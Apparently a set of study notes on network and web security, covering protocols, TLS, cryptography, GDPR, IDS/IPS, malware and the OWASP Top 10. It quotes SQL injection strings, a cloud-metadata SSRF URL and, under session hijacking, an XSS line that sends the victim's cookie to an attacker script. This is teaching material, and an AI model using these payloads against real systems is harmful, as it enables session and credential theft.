1. Application Layer Protocols

Application layer protocols facilitate communication and data sharing between software applications on various network devices. They operate at the application layer of the OSI and TCP/IP models.

HTTP (Hypertext Transfer Protocol)

  • Port Allocation: Operates by default over Port 80.
  • Transport Baseline: Relies entirely on TCP at the transport layer for data delivery reliability.
  • Architectural State: Completely Stateless—the server retains no information or history about previous client requests.
  • In-band Behavior: Control commands and actual data are sent together through the same channel.
HTTP 1.0 (Non-Persistent) HTTP 1.1 (Persistent)
Every single request/response pair requires establishing a brand new TCP connection. Keeps the TCP connection open across multiple successive object requests.
High overhead due to constant connection handshakes. Greatly reduces network latency and resource consumption.

Core Commands: GET, POST, HEAD, PUT, DELETE, and CONNECT.

FTP & Email Protocols (SMTP / POP)

FTP (File Transfer Protocol)

Dual-Port Operation: Separates communication into two channels.

  • Port 21 (Control): Passes commands and user auth.
  • Port 20 (Data): Opened dynamically for file transfers.

Out-of-Band & Stateful: Data stream is decoupled from control. Server tracks user login state and directory paths.

SMTP & POP

SMTP (Port 25): Connection-oriented (TCP). Dedicated exclusively to sending/pushing emails to a mail server. Historically 7-bit ASCII.

POP (Port 110): Used by clients to retrieve/download messages. Downloads messages locally and deletes from server cache by default (lacks dynamic cross-device synchronization).

2. Email Security & Threat Mitigation

Email is pervasive and highly vulnerable. Threats target Authenticity, Integrity, Confidentiality, and Availability.

Primary Email Threats

  • Phishing: Fake emails pretending to be real organizations to steal credentials or financial info.
  • Spam: Unwanted bulk emails often used for scams/malware.
  • Email Spoofing: Forging the sender address to bypass trust filters.

Core Email Security Protocols

To combat these threats, standard protocols are used to ensure the source is valid and content is unaltered:

  • SPF (Sender Policy Framework): Uses DNS TXT records to associate a domain name with authorized IP address ranges. Checks if mail is sent from an authorized server.
  • DKIM (DomainKeys Identified Mail): Enables an MTA (Mail Transfer Agent) to add a digital signature to selected headers and the message body, validating the source domain and ensuring body integrity.
  • DMARC (Domain-based Message Authentication, Reporting, and Conformance): Combines SPF + DKIM. Signals to receiving servers exactly how to handle emails that fail authentication (fake emails).
  • S/MIME (Secure/Multipurpose Internet Mail Extension): Provides message confidentiality (encryption) and authentication/integrity (digital signatures) using RSA Data Security and X.509v3 certificates (RFC 5750). Converts entire bodies into a Canonical form prior to processing.
  • STARTTLS: An SMTP extension providing authentication, integrity, and confidentiality by running the entire SMTP message over TLS.
  • DANE & DNSSEC: DANE provides an alternative channel for authenticating public keys based on DNSSEC, which protects the integrity of DNS data itself.

3. Common Web Attacks

Cross-Site Scripting (XSS)

A vulnerability allowing a third party to execute a script in the user's browser on behalf of the web application. Impacts include account compromise, privilege escalation, and malware infection.

Type of XSS Mechanism
Reflected XSS Payload is delivered directly to the victim and embedded in the server's immediate response (e.g., malicious script in a search field URL).
Stored XSS Payload is permanently stored on the target server (e.g., in a comment thread) and executes automatically on every user visit without manual submission.
DOM Based XSS Happens completely in the browser (client-side) modifying the Document Object Model via JavaScript. The server may never even see the malicious payload.

SQL Injection (SQLi)

Exploits improper input sanitization to manipulate backend databases. It can expose sensitive data, bypass logins, and result in full database compromise.

SQLi Security Levels (DVWA Examples)

  • Low Security: User input is directly appended to the query. Highly vulnerable to basic payloads like ' OR 1=1 or ' UNION SELECT usernames, passwords.
  • Medium Security: Basic sanitization or escaping of characters (like '). Requires slightly modified payloads (e.g., integer-based injection like 1 OR 1=1).
  • High Security: Application strictly filters, limits, or completely separates logic from user input, requiring advanced techniques or preventing it entirely.

4. Access Control Models & Firewalls

Formal Access Control Models

Harrison-Ruzzo-Ullman (HRU) Model

Defines a method to allow changes to access rights (unlike Bell-LaPadula). Built on an access control matrix with generic rights and 8 primitive commands (Create/Delete object/subject, Read/Grant/Delete/Transfer access right).

Brewer-Nash (Chinese Wall) Model

Designed to prevent conflicts of interest. If a user selects one of two conflicting datasets (e.g., working for two competing clients), they are cryptographically walled off from accessing the conflicting data.

Firewall Processing Modes

Firewalls separate untrusted networks (the Internet) from trusted internal networks. They fall into several major categories:

  1. Packet-Filtering Firewalls: Examines header information (IP, UDP/TCP port, direction) at OSI Layer 3 (Network). Rules enforce address restrictions via ACLs.
    • Static: Rules developed and installed manually by administrators.
    • Dynamic: Can react to emergent events and update/create rules dynamically (e.g., dropping packets upon detecting malformed traffic).
  2. Stateful Packet Inspection (SPI) Firewalls: Also known as stateful inspection. Keeps track of each network connection between internal and external systems using a State Table. It tracks Source IP/Port, Destination IP/Port, Protocol, and Time Remaining. Requires more processing but speeds up responses to recognized/established connections.
  3. Application Layer Proxy Firewalls: Operates at the application layer. Frequently installed on a dedicated proxy server in a DMZ. Intercepts requests on behalf of the client. Disadvantage: Typically restricted to a single application (FTP, HTTP, SMTP) due to high processing requirements for deep inspection.
  4. MAC Layer Firewalls: Make filtering decisions based on the specific host computer's MAC address at the Data Link layer (OSI Layer 2).
  5. Hybrid Firewalls / NextGen (NGFW) / UTM: Combines multiple methodologies (e.g., packet filtering + proxy). Unified Threat Management (UTM) devices integrate SPI, IPS/IDS, spam filters, and malware scanners into a single appliance.

5. Virtual Private Networks (VPNs)

A VPN is a private data network utilizing public telecommunications (the Internet) coupled with tunneling protocols and cryptographic security procedures.

VPN Core Requirements

  • Encapsulation: Native protocol data is embedded within frames of a routing protocol.
  • Encryption: Data contents are kept private in transit.
  • Authentication: Validating the remote computer/user.

Types of VPNs

  • Trusted VPN (Legacy): Uses leased circuits from a service provider. The organization relies on contractual assurance that circuits are safe and unshared.
  • Secure VPN: Uses security protocols like IPSec to encrypt traffic transmitted across unsecured public networks.
  • Hybrid VPN: Combines trusted (leased lines) with secure VPN encryption.

IPSec: Transport vs. Tunnel Mode

IPSec is the dominant protocol in VPNs. It can operate in two modes:

Transport Mode Tunnel Mode (Implied Context)
Data (payload) within the IP packet is encrypted, but the header is not. Entire IP packet (header and data) is encrypted and encapsulated into a new IP packet.
Allows user to establish a direct secure link with a remote host. (End-to-End communication). Typically used between gateways (e.g., router to router) hiding the internal network topology.
Downside: Eavesdroppers can still identify the destination and packet flow. Prevents traffic analysis since original headers are hidden.
Great for telecommuting employees connecting directly to a server. Used when connecting an entire remote branch office to headquarters.

6. TLS & SSL Architecture

Secure Sockets Layer (SSL) was developed by Netscape. It has been deprecated by the IETF due to vulnerabilities and replaced by Transport Layer Security (TLS) (current major versions are 1.2 / RFC 5246 and 1.3). TLS provides reliable end-to-end secure services over TCP.

Historical Threat: The Heartbleed Bug

Revealed in April 2014, this was a critical vulnerability in the OpenSSL implementation of the TLS/DTLS heartbeat extension. Classified as a buffer overread error, it allowed attackers to request data from the server's memory, exposing sensitive keys, passwords, and user data because the server sent back more data than was actually requested.

Security Placement in the TCP/IP Stack

  • Network Level (IPSec): Transparent to end-users/applications; general-purpose.
  • Transport Level (SSL/TLS): Implemented just above TCP. Can be embedded in specific packages (e.g., web browsers).
  • Application Level (S/MIME, Kerberos, S-HTTP): Service is tailored specifically to the needs of a given application.

TLS Architecture Concepts

TLS is not a single protocol, but two layers of protocols. Two critical concepts govern its operation:

Connection

A transient, peer-to-peer transport relationship. Every connection is associated with exactly one session.

Session

An association between a client and a server created by the Handshake Protocol. Defines cryptographic parameters shared among multiple connections to avoid expensive renegotiation.

The 4 TLS Specific Protocols

1. TLS Record Protocol

Provides basic security services (Confidentiality via symmetric encryption and Message Integrity via MAC) to higher-layer protocols like HTTP. The operation steps are:

  1. Fragmentation: Data is fragmented into blocks of 214 bytes (16,384 bytes) or less.
  2. Compression: Optional lossless compression (must not increase content length by more than 1024 bytes).
  3. Add MAC: Computes a Message Authentication Code over the compressed data using HMAC (MD5 or SHA-1).
  4. Encrypt: Compressed message + MAC are encrypted using symmetric ciphers (AES, 3DES, RC4).
  5. Append Header: Prepends a header containing Content Type, Major/Minor Version, and Compressed Length.

2. Change Cipher Spec Protocol

The simplest protocol. Consists of a single message (1 byte with the value 1). Causes the pending state to be copied into the current state, updating the cipher suite used on the connection.

3. Alert Protocol

Conveys TLS-related alerts. The first byte indicates severity: warning (1) or fatal (2). Fatal alerts immediately terminate the connection. Examples of fatal alerts:

  • unexpected_message: Inappropriate message received.
  • bad_record_mac: Incorrect MAC received.
  • handshake_failure: Unable to negotiate an acceptable set of security parameters.

4. TLS Handshake Protocol

The most complex part of TLS. Allows server and client to mutually authenticate, negotiate encryption/MAC algorithms, and establish cryptographic keys before application data is transmitted.

The 4 Phases of the TLS Handshake

  • Phase 1: Establish Security Capabilities: Client sends client_hello (Version, 32-bit timestamp + 28-byte random nonce, Session ID, CipherSuite list, Compression methods). Server responds with server_hello choosing the highest common parameters.
  • Phase 2: Server Auth & Key Exchange: Server sends its X.509 certificate. If required (e.g., using Ephemeral Diffie-Hellman or RSA signature-only keys), it sends a server_key_exchange message. It may request a client certificate, then sends server_hello_done.
  • Phase 3: Client Auth & Key Exchange: Client sends its certificate (if requested), followed by client_key_exchange (sending the pre-master secret encrypted with server's public key).
  • Phase 4: Finish: Both sides send change_cipher_spec to activate negotiated keys, followed by a finished message containing a hash of all previous handshake messages to verify integrity.
Supported Key Exchange Methods
  • RSA: Secret key encrypted with receiver's public key.
  • Fixed Diffie-Hellman: Public key parameters are fixed and stored in the certificate.
  • Ephemeral Diffie-Hellman: Creates temporary, one-time secret keys signed using sender's private RSA/DSS key. The most secure option (Perfect Forward Secrecy).
  • Anonymous Diffie-Hellman: No authentication. Highly vulnerable to Man-in-the-Middle (MITM) attacks.

7. Cryptography & Hashing

Encryption Types

Symmetric Encryption

Uses the same key for both encryption and decryption. Faster, but key distribution is difficult.

Asymmetric Encryption

Uses two different keys (Public and Private). Public key is shared openly; private key is kept secret. Used in digital signatures.

Digital Signatures

A cryptographic technique verifying authenticity, integrity, and non-repudiation of a digital message. Relies on asymmetric cryptography.

How Digital Signatures Work

  • Sender Side (Signing): A hash function generates a fixed-length message digest from the original message. The sender encrypts this digest using their Private Key. This encrypted digest is the digital signature.
  • Transmission: The sender transmits the original message along with the digital signature.
  • Receiver Side (Verification): The receiver decrypts the signature using the sender's Public Key to reveal the original hash. The receiver independently hashes the received message. If both hashes match exactly, integrity and authenticity are confirmed.
Digital Signature Electronic Signature
Cryptographic mechanism using Public Key Infrastructure (PKI). Generic electronic consent method (e.g., typing a name, clicking "I Agree").
Ensures authentication, integrity, and non-repudiation. Mainly indicates intent or approval. May not use cryptography.
High security, tamper-evident. Used for legally sensitive transactions. Security depends on basic implementation. Used for general agreements.

Digital Certificates

An electronic document issued by a trusted Certificate Authority (CA) that binds an identity to a public key (Standard: X.509).

  • Contents: Name of holder, Unique serial number, Validity period, Public key of the holder, and the Digital Signature of the issuing CA.
  • Advantages: Network security against MITM, builds user trust, enables HTTPS.
  • Disadvantages: Costs money, complex installation, requires strict management to prevent expiry or private key compromise.

Cryptographic Hash Functions

Mathematical algorithms that transform input data of any size into a fixed-length sequence of characters (hash value / digest). Used for password storage, data integrity checks, and digital signatures.

Core Properties of a Secure Hash Function

  • Deterministic: The same input always generates the exact same hash output.
  • Avalanche Effect: Flipping just a single bit in the input significantly and unpredictably alters the resultant hash.
  • One-Way (Pre-image Resistance): It is computationally infeasible to reverse-engineer or retrieve the original input from its hash value.
  • Collision Resistance: It is practically impossible to find two different inputs that produce the exact same hash output.

Popular Cryptographic Hash Algorithms

MD5 & SHA-1 (Deprecated)

MD5: Widely used historically, but highly vulnerable to hash collisions. No longer recommended.
SHA-1: Improved upon MD5 but advances in cryptanalysis exposed weaknesses leading to practical collision attacks. Deprecated for SSL/TLS.

SHA-2 & SHA-3 (Modern Standards)

SHA-2: Industry standard offering robust security (outputs of 256 and 512 bits).
SHA-3 (Keccak): Latest NIST standard using a unique sponge construction, enhancing security and flexibility.

BLAKE2 & BLAKE3

Designed as high-speed, secure alternatives to SHA-2/SHA-3. BLAKE3 supports parallel processing, making it ideal for systems requiring extreme speed without compromising guarantees.

Hash Function Encryption
One-way process; original data cannot be recovered. Two-way process; original data can be recovered using a decryption key.
Fixed-length output regardless of input size. Output size varies, usually similar to input size.
Ensures Data Integrity and Authenticity. Ensures Data Confidentiality.

8. GDPR Compliance

The General Data Protection Regulation (GDPR) is a comprehensive law enacted by the European Union (EU) governing how personally identifiable information (PII) is collected, processed, and deleted. It became fully effective on May 15, 2018 (replacing the 1995 EU Data Protection Directive).

Fines & Penalties for Non-Compliance

GDPR imposes severe administrative fines structured in two tiers based on the severity of the breach:

  • Lower Tier: Up to €10 million, or 2% of the preceding fiscal year's global annual turnover, whichever is greater.
  • Upper Tier: Up to €20 million, or 4% of the preceding fiscal year's global annual turnover, whichever is greater.

Regulators can also impose temporary/permanent processing bans and data erasure orders.

Key Features & Terminology

  • Roles: Requires the Data Controller and Data Processor to designate a Data Protection Officer (DPO) to oversee data security strategy.
  • Territorial Scope: Applies to any company processing personal data of EU citizens, regardless of the company's geographical location.
  • Consent Matters: Enterprises must obtain "clear, affirmative action voluntarily given, specific, informed, and unambiguous authorization" before processing data.
  • Breach Notification: Breaches must be reported to the Data Protection Authority within 72 hours of discovery.
  • Right to be Forgotten: Allows subjects to request data deletion. Note: This creates compliance conflicts with immutable technologies like Blockchain (e.g., Hyperledger Fabric).
  • Privacy by Design: Data protection must be built in from system inception, not as an afterthought.

The 7 Fundamental Principles of GDPR

  1. Legality, fairness, and transparency: Documented lawful purpose; subject is fully informed.
  2. Limitation of purpose: Data collected only for a specific, documented purpose.
  3. Data Minimization: Collect only what is adequate, relevant, and strictly necessary.
  4. Accuracy: Ensure data is correct and updated; delete/change upon request.
  5. Storage Limitation: Do not keep data longer than necessary (enforce expiration dates).
  6. Integrity and Confidentiality: Safeguard data against theft or unauthorized use.
  7. Accountability: Data collectors are strictly responsible for proving GDPR compliance.

Roles in Organizational Compliance

Compliance involves multiple departments. For example, Workplace compliance falls to HR, while legal risks are handled by the General Counsel (GC) or Chief Legal Officer (CLO). Reporting to the CLO maintains attorney-client privilege, protecting internal communications from legal disclosure.

6 Steps to Ensure GDPR Compliance

  • Understand the Law: Conduct a compliance audit to understand obligations for collection, processing, and storage.
  • Examine Other Organizations: Learn from peers who have successfully reached compliance.
  • Classify Data: Identify all PII, where it is stored, who has access, and whether it falls into special categories.
  • Website Attention: Modify forms, cookies, and opt-ins to obtain explicit consent.
  • Data Paths: Map exactly how data enters, is stored, transferred, and deleted.
  • Revise and Audit: Continuously review and patch flaws. Ensure data is not shared for unrelated purposes.

9. IDS, IPS & Malware

Intrusion Detection System (IDS)

An IDS is a passive "watchdog" security tool that monitors network traffic or system activities to detect unauthorized access or suspicious behavior. It alerts administrators but does not actively block attacks.

NIDS (Network IDS)

Deployed at strategic network points (e.g., behind firewalls) to monitor traffic from all devices across subnets, comparing it against known attack signatures.

HIDS (Host IDS)

Operates on individual critical devices (servers). Monitors local traffic and file integrity by comparing current system files with previous snapshots to detect unauthorized modifications.

Other Types: Hybrid IDS (combines NIDS+HIDS, e.g., Prelude), APIDS (Application Protocol-Based, monitors specific app traffic like SQL), PIDS (Protocol-Based, monitors traffic like HTTPS for deviations).

Signature-Based Detection Anomaly-Based Detection
Relies on predefined patterns (signatures) of known attacks. Uses ML/statistical models to define "normal" baseline behavior; flags deviations.
Highly effective for known threats; very low false positives. Can detect zero-day/unknown attacks.
Blind to new or unknown attacks until the database is updated. Suffers from a high rate of false positives.

IDS Evasion Techniques

  • Fragmentation: Breaking malicious packets into tiny fragments. If the IDS only scans full packets, it bypasses detection.
  • Packet Encoding: Hiding malicious content using Base64 or Hexadecimal encoding.
  • Traffic Obfuscation: Altering packet structure to confuse the IDS parser.
  • Encryption: Hiding malicious payloads inside encrypted traffic (TLS/SSL).

Intrusion Prevention System (IPS)

An IPS extends IDS capabilities by operating in-line (directly in the flow of traffic). It actively monitors network traffic in real-time and automatically blocks malicious activity before it reaches the target.

  • Traffic Preprocessing: Performs Traffic Normalization (standardizing formats to prevent encoding evasion) and Packet Reassembly (rebuilding fragmented packets for inspection).
  • Deep Packet Inspection (DPI): Analyzes Network layer (origins), Transport layer (connection integrity), and App layer (data payloads).
  • Automated Responses: Can drop malicious packets, block source IPs, terminate suspicious sessions, or update firewall rules dynamically.
Firewall IDS IPS
Restricts traffic based on predefined rules (IP, Port). Passive watchdog. Detects and alerts on suspicious payloads. Active inline defense. Detects and blocks malicious payloads.

Malware and its Types

Malware (malicious software) disrupts operations, steals data, or allows remote control of systems.

Ransomware

Locks/encrypts files and demands payment.
Example: WannaCry (2017) exploited a Windows vulnerability to globally cripple hospitals and businesses.

Worms

Self-replicating malware that spreads automatically across networks without user action.
Example: Stuxnet targeted industrial control systems, destroying nuclear centrifuges.

Trojan Horse

Disguises itself as legitimate software. Once installed, it grants attackers backdoor access.
Example: Emotet (started as a banking trojan, evolved into a ransomware delivery platform).

Spyware

Secretly monitors user activities (passwords, browsing, calls).
Example: Pegasus (advanced spyware targeting mobile devices of journalists/officials).

Other Types: Botnets (networks of infected zombie devices controlled by a hacker for DDoS attacks), Adware (unwanted ads targeting browser behavior).

Steps to Remove Malware

  • Install Anti-Malware: Download tools like Malwarebytes, SUPERAntiSpyware, or MSRT.
  • Update Definitions: Ensure the local malware signature database is up to date.
  • Run Full Scan: Check all processes, registries, and storage.
  • Review & Quarantine: Isolate suspicious files to prevent further damage.
  • Remove & Restart: Delete quarantined items and reboot the system. Verify normal behavior.

10. OWASP Top 10 (2021)

The Open Web Application Security Project (OWASP) Top 10 is the industry-standard awareness document highlighting the most critical web application security risks.

1. Broken Access Control

Occurs when access controls are poorly enforced, allowing users to access data or functions they shouldn't. Includes IDOR (Insecure Direct Object Reference) where internal keys/IDs are exposed (e.g., changing /object/12345 to 123456). Prevents via Role-Based Access Control (RBAC), the principle of least privilege, and server-side authorization.

2. Cryptographic Failures

Failure to properly secure sensitive data at rest or in transit. Exploitations occur due to plaintext transmission (HTTP/FTP), deprecated hash functions (MD5/SHA1), or default/hard-coded crypto keys. Prevented by using modern algorithms (AES-256), rotating keys, and enforcing HTTPS/TLS.

3. Injection

Untrusted data is sent to an interpreter as part of a command or query (SQL, OS, LDAP). For example, bypassing auth with ' OR '1'='1. Prevented by using parameterized queries (prepared statements), input validation, and deploying a WAF.

4. Insecure Design

Focuses on risks related to design and architectural flaws. Cannot be fixed by secure implementation alone if the design is fundamentally flawed. Requires Secure SDLC, threat modeling, and robust use-case testing during the design phase.

5. Security Misconfiguration

Caused by insecure default settings, open cloud storage, or verbose error messages. E.g., deploying a CMS with default admin/admin credentials. Prevented using Dynamic Application Security Testing (DAST) and automated configuration verification.

6. Vulnerable & Outdated Components

Using unsupported or outdated software libraries and frameworks. Example: An application running an old Apache Struts version susceptible to Remote Code Execution (RCE). Prevented by strictly maintaining/updating libraries from official sources.

7. Identification & Authentication Failures

Flaws allowing attackers to compromise passwords, keys, or session tokens. Includes credential stuffing and brute-force attacks. Prevented by enforcing MFA, blocking default/weak passwords, and securing session IDs.

8. Software & Data Integrity Failures

Code/infrastructure relies upon plugins or modules from untrusted sources. Includes insecure CI/CD pipelines and auto-updates lacking digital signature verification. Attackers can push malicious updates to clients.

9. Security Logging & Monitoring Failures

Failing to log critical events (like repeated failed logins) or monitor logs for suspicious activity. Delays breach detection, allowing attackers deep persistence.

10. Server-Side Request Forgery (SSRF)

Occurs when an app fetches a remote resource without validating the user-supplied URL. Attackers can force the server to connect to internal-only services. Example: Tricking an AWS cloud instance to fetch http://169.254.169.254/latest/meta-data/ to steal cloud credentials.

11. Session Management & Hijacking

Because HTTP is a stateless protocol, websites use sessions to correlate a series of requests from a single client. An authenticated user's session state is highly valuable to attackers.

Centralized vs. Decentralized Session Management

Centralized Session Management Decentralized Session Management (e.g., JWT)
User's state is stored on the server (e.g., in a database). User's state is stored in the client as a digitally signed token (JSON Web Token).
Server generates a random Session ID, sends it to the client, and looks it up on each request. Server issues a token. Client presents it; server cryptographically verifies the signature to grant access.
Easy to invalidate/revoke (simply delete the ID from the server database). Hard to revoke before expiration since it is self-contained. Requires Access Tokens (short life) and Refresh Tokens.

Decentralized Token Verification Vulnerability

Some JWT libraries have historically accepted tokens without a signature. An attacker can create a fake token with elevated privileges, indicate it requires no signature, and if the resource server doesn't enforce signature checks, the attacker gains full access.

Session ID Storage & Transmission

Session IDs must contain at least 64 bits of entropy to prevent prediction attacks. They should be stored in Cookies rather than Local Storage or URL parameters.

  • HttpOnly flag: Prevents JavaScript from accessing the cookie, heavily mitigating XSS-based theft.
  • Secure flag: Ensures the cookie is only transmitted over encrypted (HTTPS) connections, preventing MITM sniffing.
  • SameSite flag (Strict/Lax): Protects against Cross-Site Request Forgery (CSRF).

Session Timeouts

  • Idle Timeout: Times out after a specific period of inactivity.
  • Absolute Timeout: Times out after a specific total time period, regardless of activity.
  • Renewal Timeout: Server invalidates the old session ID and issues a new one periodically to limit the window of exploitation.

Session Hijacking Mechanics

Session hijacking allows an attacker to take over a legitimate user's session and impersonate them. Real-world examples include Zoom bombing, Slack cookie theft, and GitLab token flaws.

Cross-Site Scripting (XSS)

Attacker injects a malicious JS payload into a vulnerable site. The script captures the victim's session cookie (if not marked HttpOnly) and sends it to the attacker's server.
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);

Session Fixation

The attacker generates a valid session ID, tricks the victim into logging in using that specific ID (via a malicious link), and then uses the known ID to hijack the session. Defense: Generate a completely new ID immediately upon login.

IP Spoofing

Attacker steals/guesses the session ID, spoofs the victim's IP address, and injects packets into the TCP stream, bypassing server controls that rely on IP addresses for tracking.

Packet Sniffing / MITM

Using tools like Wireshark or tcpdump on an unsecured network (e.g., public Wi-Fi) to intercept unencrypted traffic and steal the session token in transit. Defense: HTTPS / HSTS.